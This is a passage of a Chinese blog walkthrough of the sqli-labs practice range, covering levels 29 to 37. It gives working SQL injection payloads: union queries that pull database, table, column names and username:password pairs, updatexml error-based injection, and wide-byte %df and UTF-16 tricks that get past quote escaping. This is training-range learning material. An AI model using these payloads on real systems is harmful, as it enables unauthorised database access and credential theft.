id<span class="token operator">=</span>-1' union <span class="token keyword">select</span>  1,2,database<span class="token punctuation">(</span><span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/29_5.png" class>

<h3 id="29-3获得表名"><a href="#29-3获得表名" class="headerlink" title="29.3获得表名"></a>29.3获得表名</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>-1' union <span class="token keyword">select</span>  1,2,<span class="token punctuation">(</span>select group_concat<span class="token punctuation">(</span>table_name<span class="token punctuation">)</span> from information_schema.tables where table_schema<span class="token operator">=</span>database<span class="token punctuation">(</span><span class="token punctuation">))</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/29_6.png" class>

<h3 id="29-4获得字段名"><a href="#29-4获得字段名" class="headerlink" title="29.4获得字段名"></a>29.4获得字段名</h3><pre class="line-numbers language-bash"><code class="language-bash">payload:

id<span class="token operator">=</span>-1<span class="token string">' union select  1,2,(select group_concat(column_name) from information_schema.columns where table_name='</span>users'<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/29_7.png" class>

<h3 id="29-5获取用户名和密码"><a href="#29-5获取用户名和密码" class="headerlink" title="29.5获取用户名和密码"></a>29.5获取用户名和密码</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>-1' union <span class="token keyword">select</span>  1,2,<span class="token punctuation">(</span>select group_concat<span class="token punctuation">(</span>username,0x3a,password<span class="token punctuation">)</span> from <span class="token function">users</span> limit 1<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/29_8.png" class>

<h2 id="Less-30"><a href="#Less-30" class="headerlink" title="Less-30"></a>Less-30</h2><p>这一关不显示报错信息，不能用报错注入了，但还是可以用union联合注入的，payload跟第二十九的一样，只需要将第二十九关的union联合注入的’换成”即可</p>
<h2 id="Less-31"><a href="#Less-31" class="headerlink" title="Less-31"></a>Less-31</h2><p>这关跟二十九关也一样，只需要将’换成”)即可，对于报错注入和union联合注入都能用。</p>
<h1 id="宽字节注入-Less-32-Less-37"><a href="#宽字节注入-Less-32-Less-37" class="headerlink" title="宽字节注入(Less-32~Less-37)"></a>宽字节注入(Less-32~Less-37)</h1><p>这几关是针对’和\的过滤。在这里，会将’转换为&#39;</p>
<p>宽字节注入产生的原因：数据库编码与PHP编码设置为不同的两个编码。</p>
<p>Big5和GBK字符集有可能会存在宽字节注入，utf-8和gb2312没有。Mysql在使用GBK编码时，会认为两个字符为一个汉字。</p>
<p>思路一：%df吃掉\ 原因在于urldecode(‘)=%5c%27,而我们在前面添加%df，就形成了%df%5c%27,mysql在GBK编码中前两个字当做一个汉字，此时%27就会作为一个单独的字符，也就是’</p>
<p>思路二：将&#39;中的\过滤掉。可以构造%**%5c%5c%27，后面的%5c会被前面的%5c给注释掉。</p>
<h2 id="Less-32"><a href="#Less-32" class="headerlink" title="Less-32"></a>Less-32</h2><p>本关将’转换为&#39;，我们利用%df消掉生成的那个\。</p>
<h3 id="采用报错注入："><a href="#采用报错注入：" class="headerlink" title="采用报错注入："></a>采用报错注入：</h3><h4 id="①获得数据库名-1"><a href="#①获得数据库名-1" class="headerlink" title="①获得数据库名"></a>①获得数据库名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1%df<span class="token string">' and updatexml(1,concat(0x7e,user(),0x7e),1)--+

或者

id=1%df'</span> and info<span class="token punctuation">(</span><span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="②获得数据库用户名-1"><a href="#②获得数据库用户名-1" class="headerlink" title="②获得数据库用户名"></a>②获得数据库用户名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

1%df' and updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,database<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h2 id="Less-33"><a href="#Less-33" class="headerlink" title="Less-33"></a>Less-33</h2><p>本关的payload和第三十二关一样。</p>
<h2 id="Less-34"><a href="#Less-34" class="headerlink" title="Less-34"></a>Less-34</h2><p>本关是post型的注入。</p>
<p>这里不能用%df绕过了，因为这里不是get方式不会经过urldecode，可以考虑将utf-8转换成utf-16。例如将’转为utf-16为�’</p>
<h3 id="然后可以采用报错注入："><a href="#然后可以采用报错注入：" class="headerlink" title="然后可以采用报错注入："></a>然后可以采用报错注入：</h3><p>在用户框输入payload:</p>
<pre class="line-numbers language-bash"><code class="language-bash">1�' or updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,user<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">)</span><span class="token comment" spellcheck="true">#</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>即可获得数据库用户名。</p>
<h2 id="Less-35"><a href="#Less-35" class="headerlink" title="Less-35"></a>Less-35</h2><p>本关源码中id=$id，所以不用输单引号，也就不用考虑单引号转义的问题了。</p>
<h3 id="采用union联合注入"><a href="#采用union联合注入" class="headerlink" title="采用union联合注入"></a>采用union联合注入</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>-1 union <span class="token keyword">select</span> 1,2,user<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>即可获得数据库用户名</p>
<h2 id="Less-36"><a href="#Less-36" class="headerlink" title="Less-36"></a>Less-36</h2><p>本关还是可以用%df绕过，payload和第三十二关一样。</p>
<h2 id="Less-37"><a href="#Less-37" class="headerlink" title="Less-37"></a>Less-37</h2><p>本关一样可以将单引号转换为utf-16，payload和第三十四关一样。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">echozt</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://echozt.github.io/posts/fb8a.html">https://echozt.github.io/posts/fb8a.html</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">echozt</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E9%9D%B6%E5%9C%BA/">
                                    <span class="chip bg-color">靶场</span>
                                </a>
                            
                                <a href="/tags/Web%E6%BC%8F%E6%B4%9E/">
                                    <span class="chip bg-color">Web漏洞</span>
                                </a>
                            
                                <a href="/tags/sql%E6%B3%A8%E5%85%A5/">
                                    <span class="chip bg-color">sql注入</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">谢谢大佬的赞赏</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/posts/7e37.html">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/4.jpg" class="responsive-img" alt="sqli靶场(38~53关)">
                        
                        <span class="card-title">sqli靶场(38~53关)</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            第三部分主要是堆叠注入。
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-04-11
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E4%B8%93%E9%A1%B9%E9%9D%B6%E5%9C%BA/" class="post-category">
                                    专项靶场
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E9%9D%B6%E5%9C%BA/">
                        <span class="chip bg-color">靶场</span>
                    </a>
                    
                    <a href="/tags/sql%E6%B3%A8%E5%85%A5/">
                        <span class="chip bg-color">sql注入</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/posts/bb32.html">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/4.jpg" class="responsive-img" alt="sqli靶场(1~22关)">
                        
                        <span class="card-title">sqli靶场(1~22关)</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            又是疯狂打靶场的一天，这个sqli靶场真的好多关，我之前试过打过几关，没有坚持，但万事开头难，总归是慢慢打完了。
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-04-08
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E4%B8%93%E9%A1%B9%E9%9D%B6%E5%9C%BA/" class="post-category">
                                    专项靶场
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E9%9D%B6%E5%9C%BA/">
                        <span class="chip bg-color">靶场</span>
                    </a>
                    
                    <a href="/tags/Web%E6%BC%8F%E6%B4%9E/">
                        <span class="chip bg-color">Web漏洞</span>
                    </a>
                    
                    <a href="/tags/sql%E6%B3%A8%E5%85%A5/">
                        <span class="chip bg-color">sql注入</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('100')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE' || selection.getRangeAt(0).commonAncestorContainer.nodeName === 'CODE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: echozt<br />'
            + '文章作者: echozt<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2022-2024</span>
            
            <a href="/about" target="_blank">echozt</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">49.3k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/echozt" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1732973548@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>













    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

    <!--单击显示文字-->
    <script type="text/javascript" src="/js/click_show_text.js"></script>

</body>

</html>
